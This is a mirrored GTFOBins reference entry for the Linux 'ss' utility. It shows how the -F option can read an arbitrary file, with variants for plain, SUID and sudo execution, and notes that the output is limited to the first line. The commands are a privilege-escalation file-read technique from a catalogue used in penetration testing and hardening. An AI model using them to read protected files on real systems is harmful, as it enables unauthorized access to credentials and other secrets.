mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-13 15:29:39 +01:00
18 lines
359 B
Markdown
18 lines
359 B
Markdown
|
---
|
||
|
description: |
|
||
|
The read file content is limited to the first line and corrupted by an error message.
|
||
|
functions:
|
||
|
file-read:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
ss -a -F "$LFILE"
|
||
|
suid:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
./ss -a -F "$LFILE"
|
||
|
sudo:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
sudo ss -a -F "$LFILE"
|
||
|
---
|